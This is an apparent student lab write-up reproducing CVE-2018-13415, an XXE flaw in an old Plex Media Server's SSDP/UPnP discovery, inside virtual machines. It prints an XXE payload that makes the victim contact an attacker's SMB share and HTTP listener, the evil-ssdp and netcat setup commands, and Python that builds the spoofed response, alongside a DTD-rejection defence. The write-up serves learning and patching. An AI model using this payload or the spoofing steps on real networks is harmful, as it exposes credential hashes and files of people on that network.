“All Your Base Belong to Us” One good example of why it is important to keep your software up-to-date.

Randall Chapman
Jun 10, 2021

I explore the ability to take over a system using the SSDP/UPnP protocol through an outdated version of Plex Media Server.

Definitions:

Plex Media Server “Plex is a global streaming media service and a client–server media player platform, made by Plex, Inc. The Plex Media Server organizes video, audio, and photos from a user’s collections and from online services, and streams it to the players. The official clients and unofficial third-party clients run on mobile devices, smart TVs, streaming boxes, and in web apps.” (www.wikipedia.org/wiki/Plex_(company))

Plex Pass is a plex.tv subscription service that gives premium access to most of the features Plex offers, early previews of upgrades and apps, and discounts on other subscription add-ons.

UPnP “Universal Plug and Play (UPnP) is a set of networking protocols that permits networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points and mobile devices to seamlessly discover each other’s presence on the network and establish functional network services. UPnP is intended primarily for residential networks without enterprise-class devices.” (www.wikipedia.org/wiki/Universal_Plug_and_Play)

SSDP “Simple Service Discovery Protocol (SSDP) is a network protocol based on the Internet protocol suite for advertisement and discovery of network services and presence information. It accomplishes this without assistance of server-based configuration mechanisms, such as Dynamic Host Configuration Protocol (DHCP) or Domain Name System (DNS), and without special static configuration of a network host. SSDP is the basis of the discovery protocol of Universal Plug and Play (UPnP) and is intended for use in residential or small office environments.” (www.wikipedia.org/wiki/Simple_Service_Discovery_Protocol)

VM “Virtual Machine (VM) is the virtualization/emulation of a computer system. Virtual machines are based on computer architectures and provide functionality of a physical computer. Their implementations may involve specialized hardware, software, or a combination.” (www.wikipedia.org/wiki/Virtual_machine)

CVE “Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. The United States’ National Cybersecurity FFRDC, operated by The Mitre Corporation, maintains the system, with funding from the US National Cyber Security Division of the US Department of Homeland Security.” (www.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures)

Credit:

CVE-2018-13415 was discovered and reported by Chris Moberly @ The Missing Link Security.

Environment:

Windows 10 running in Oracle VM
Plex-media-server-1.1.0.831 running in Windows 10 VM
Kali Linux running in Oracle VM
Host System — Windows 10 Educational Version 1909

Description of vulnerability:

CVE-2018-13415 | “9.8 Critical”
Plex Media Server 1.13.2.5154 and earlier is vulnerable to XML External Entity (XXE) injection through its SSDP/UPnP discovery functionality. An attacker on the local network who can answer Plex’s SSDP search supplies a device-description document that declares external entities; when Plex parses it, the attacker can read arbitrary files from the filesystem with the permissions of the account running Plex, coerce a Windows host into authenticating to an attacker-controlled SMB share (which exposes that account’s NTLM credential hashes rather than clear-text passwords), and, per the vulnerability description, obtain remote command execution on Windows systems.

Description of this attack:

This is a remote XML External Entity (XXE) attack that requires no authentication from any user: the attacker spoofs SSDP so that Plex fetches and parses an attacker-controlled UPnP device description. Using the following XML as that description (the $smbServer, $localIp and $localPort placeholders stand for the attacker’s SMB server and HTTP listener)
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>
<root>
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
we will be able to gain access to the victim’s machine. Plex multicasts an SSDP M-SEARCH, the spoofed device answers with a LOCATION header pointing at this document, and Plex’s XML parser resolves the external entities as it reads them: the file:// entity with a UNC path makes the Windows host connect and authenticate to the attacker’s SMB server, and the http:// entity makes it request xxe.html, which confirms that the XXE fired. That is the unintended behaviour in the SSDP/UPnP handshake that gives us access.
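The exchange described above, modelled offline as an added example (my code, not the post’s and not evil-ssdp’s): the victim’s M-SEARCH, the spoofed 200 OK carrying LOCATION, and the fetched description with the post’s payload, followed by the DTD check a hardened UPnP client should apply before any XML parser sees that description. The IP 10.0.0.5, port 8888, the SERVER/USN values, the benign “Office Printer” description and the closing tags that complete the truncated payload are all constructed for the example.

```python
# Added example (mine, not code from the original post or from evil-ssdp):
# the SSDP exchange the attack rides on, with constructed messages, plus the
# DTD check a hardened UPnP client applies before parsing a description.
import re
import xml.etree.ElementTree as ET

# Constructed M-SEARCH, as a UPnP client such as Plex multicasts to
# 239.255.255.250:1900 when it looks for devices on the LAN.
M_SEARCH = (
    b"M-SEARCH * HTTP/1.1\r\n"
    b"HOST: 239.255.255.250:1900\r\n"
    b'MAN: "ssdp:discover"\r\n'
    b"MX: 2\r\n"
    b"ST: ssdp:all\r\n"
    b"\r\n"
)

# Constructed benign description in the UPnP device-1-0 namespace.
BENIGN_DESCRIPTION = (
    '<?xml version="1.0"?>\n'
    '<root xmlns="urn:schemas-upnp-org:device-1-0">\n'
    "  <specVersion><major>1</major><minor>0</minor></specVersion>\n"
    "  <device>\n"
    "    <deviceType>urn:schemas-upnp-org:device:Basic:1</deviceType>\n"
    "    <friendlyName>Office Printer</friendlyName>\n"
    "  </device>\n"
    "</root>\n"
)
UPNP_NS = "{urn:schemas-upnp-org:device-1-0}"


def parse_ssdp_message(datagram: bytes):
    """Split an SSDP datagram (HTTP over UDP) into start line and header dict.
    Names are upper-cased because SSDP headers are case-insensitive."""
    head = datagram.decode("ascii", errors="replace").split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return lines[0], headers


def build_ssdp_response(location: str, st: str = "upnp:rootdevice") -> bytes:
    """Unicast reply the spoofing host sends to whoever sent M-SEARCH.
    LOCATION is the field the victim acts on: it fetches that URL and parses
    the body as XML. SERVER and USN values are invented for the example."""
    usn = "uuid:3f1d9b9c-0000-4000-8000-000000000001::" + st
    return (
        "HTTP/1.1 200 OK\r\n"
        "CACHE-CONTROL: max-age=1800\r\n"
        "EXT:\r\n"
        f"LOCATION: {location}\r\n"
        "SERVER: Linux/3.x UPnP/1.0 fake-device/1.0\r\n"
        f"ST: {st}\r\n"
        f"USN: {usn}\r\n"
        "\r\n"
    ).encode("ascii")


def build_xxe_description(smb_server: str, local_ip: str, local_port: int) -> str:
    """Description served at LOCATION: the payload quoted in the post with its
    placeholders filled in and the truncated tail closed (my addition).
    A parser that resolves external entities does so when it meets the
    references in <hello>, so the SMB and HTTP fetches happen before it
    reaches the second top-level element <root> and rejects the document."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE foo [\n"
        "<!ELEMENT foo ANY >\n"
        f'<!ENTITY xxe SYSTEM "file://///{smb_server}/smb/hash.jpg" >\n'
        f'<!ENTITY xxe-url SYSTEM "http://{local_ip}:{local_port}/ssdp/xxe.html" >\n'
        "]>\n"
        "<hello>&xxe;&xxe-url;</hello>\n"
        "<root>\n"
        "<specVersion><major>1</major><minor>0</minor></specVersion>\n"
        "<device></device>\n"
        "</root>\n"
    )


def declares_dtd(xml_text: str) -> bool:
    """Entity declarations can only live inside a DOCTYPE, and a device
    description never needs one, so refusing any DOCTYPE blocks XXE (file
    read, SMB/HTTP callbacks) and entity-expansion DoS in one check. The scan
    is deliberately conservative: a DOCTYPE inside a comment is rejected too."""
    return re.search(r"<!DOCTYPE\b", xml_text, re.IGNORECASE) is not None


def parse_device_description(xml_text: str) -> dict:
    """Hardened client side: reject a DTD before the XML parser sees it, then
    read only the fields a discovery client actually needs."""
    if declares_dtd(xml_text):
        raise ValueError("device description declares a DTD; refusing to parse")
    device = ET.fromstring(xml_text).find(UPNP_NS + "device")
    if device is None:
        raise ValueError("no <device> element in description")
    return {
        "deviceType": device.findtext(UPNP_NS + "deviceType", ""),
        "friendlyName": device.findtext(UPNP_NS + "friendlyName", ""),
    }


def simulate_exchange(attacker_ip: str, attacker_port: int) -> dict:
    """Walk the three messages with constructed data and report what a
    vulnerable client fetches and whether a hardened one accepts the body."""
    start, req_headers = parse_ssdp_message(M_SEARCH)
    location = f"http://{attacker_ip}:{attacker_port}/ssdp/device-desc.xml"
    status, resp_headers = parse_ssdp_message(build_ssdp_response(location))
    description = build_xxe_description(attacker_ip, attacker_ip, attacker_port)
    try:
        parse_device_description(description)
        accepted = True
    except ValueError:
        accepted = False
    return {
        "request": start,
        "search_target": req_headers.get("ST"),
        "status": status,
        "location": resp_headers.get("LOCATION"),
        "vulnerable_client_fetches": description.count("SYSTEM"),  # 2 entities
        "hardened_client_accepts": accepted,
    }


if __name__ == "__main__":
    for key, value in simulate_exchange("10.0.0.5", 8888).items():
        print(f"{key}: {value}")
```

The DOCTYPE pre-check is the same rule defusedxml’s forbid_dtd enforces; it is simpler than trying to disable entity resolution in every parser configuration, and it costs nothing because no legitimate UPnP description carries a DTD.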

Set up and process:

I set up and started both my Kali and Windows 10 environments in VMs. I then installed a fresh Plex Media Server version 1.1.0.831 in the Windows 10 VM. I then logged into my Plex Pass premium account, because Plex will not actually start or run fully without internet access and a connected account.

Next I installed Evil-SSDP in my Kali VM and set it up with the following command: "evil-ssdp eth0 -t xxe-smb". I also set up Netcat to listen on port 445 with the command "sudo nc -nlvp 445".
Evil-SSDP spoofs SSDP on local networks, posing as a generic UPnP device. This tool can assist in lateral movement across networks.

After setting up both Evil-SSDP and Netcat, in a no-contact situation we would have to wait for Plex to be restarted. In this scenario I closed and restarted Plex. After a few tries and some code tweaks with the help of my college instructor, this is the output I was met with when the process executed flawlessly.

And we now have access to the machine.

Often, I was hit with errors like this:

I think this was due to outside interference from other devices on my network; I’ll need to go through them one by one after learning about SSDP/UPnP vulnerabilities. This interference was a factor because I could not run this exploit in a closed sandbox environment: Plex requires an active internet connection and a signed-in account to run.

Conclusion:

While this is not a concern in later versions of Plex Media Server, the same flaw might exist in other applications that use UPnP openly on a network and have not been tested for it. This could be an issue in many smart home devices, because the pressure to push from concept to market at lightning speed means they often end up in consumers’ homes before they have been fully tested. This lack of focus on pen-testing devices and apps could result in more widespread Ring doorbell and nanny-cam stalker incidents like those of the recent past. Beware of the devices on your network and never blindly trust the new shiny thing (IoT devices). Thank you for reading my report.
